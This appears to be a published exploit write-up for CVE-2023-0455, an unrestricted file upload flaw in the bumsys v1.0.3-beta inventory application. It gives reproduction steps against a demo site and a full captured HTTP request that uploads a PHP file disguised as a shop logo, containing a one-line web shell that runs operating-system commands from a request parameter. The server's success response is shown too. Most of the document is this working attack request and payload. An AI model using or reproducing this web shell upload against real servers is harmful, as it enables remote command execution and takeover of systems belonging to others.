Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload Google Dork : NA Date: 19-01-2023 Exploit Author: AFFAN AHMED Vendor Homepage: https://github.com/unilogies/bumsys Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip Version: 1.0.3-beta Tested on: Windows 11, XAMPP-8.2.0 CVE : CVE-2023-0455 ================================ Steps_TO_Reproduce ================================ - Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/) - Click on action button to edit the Profile - Click on select logo button to upload the image - Intercept the POST Request and do the below changes . ================================================================ Burpsuite-Request ================================================================ POST /xhr/?module=settings&page=updateShop HTTP/1.1 Host: demo.bumsys.org Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7 Content-Length: 1280 Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99" X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA Accept: */* X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.bumsys.org Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.bumsys.org/settings/shop-list/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopName" TEST ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopAddress" test ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCity" testcity ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopState" teststate ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPostalCode" 700056 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopCountry" testIND ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopPhone" 895623122 ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopEmail" test@gmail.com ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopInvoiceFooter" ------WebKitFormBoundarynO0QAD84ekUMuGaA Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php" Content-Type: image/png <?php echo system($_REQUEST['dx']); ?> ==================================================================================== Burpsuite-Response ==================================================================================== HTTP/1.1 200 OK Date: Thu, 19 Jan 2023 07:14:26 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips X-Powered-By: PHP/7.0.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65 <div class='alert alert-success'>Shop successfully updated.</div> ==================================================================================== VIDEO-POC : https://youtu.be/nwxIoSlyllQ